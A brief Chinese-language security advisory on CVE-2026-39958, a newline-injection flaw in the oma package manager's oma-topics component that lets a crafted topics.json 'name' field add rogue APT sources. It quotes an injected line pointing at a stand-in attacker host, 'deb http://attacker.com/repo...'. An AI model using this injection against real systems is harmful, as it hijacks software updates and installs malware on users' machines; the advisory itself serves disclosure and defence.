CVE-2026-39958AOSC OS的包管理器oma在1.25.2之前的版本中存在严重漏洞。oma-topics组件在处理远程仓库的Topic Manifests元数据时,未对“name”字段进行转义检查。攻击者可利用此漏洞提供包含恶意数据的清单,导致系统在/etc/apt/sources.list.d/atm.list中写入未授权的APT源条目,从而劫持软件更新过程。
该漏洞源于oma-topics组件在处理从远程服务器获取的Topic Manifests(topics.json)时,未对元数据中的“name”字段进行严格的转义或过滤。攻击者可以构造一个恶意的JSON文件,在“name”字段中插入换行符(\n)和APT源配置指令。当oma-topics获取并注册该元数据时,它会将此字段直接写入/etc/apt/sources.list.d/atm.list文件。由于未过滤换行符,攻击者注入的“deb http://attacker.com/repo...”会被解析为新的APT源,从而控制包管理器的源列表,可能导致后续安装恶意软件。
暂无PoC代码
暂无版本信息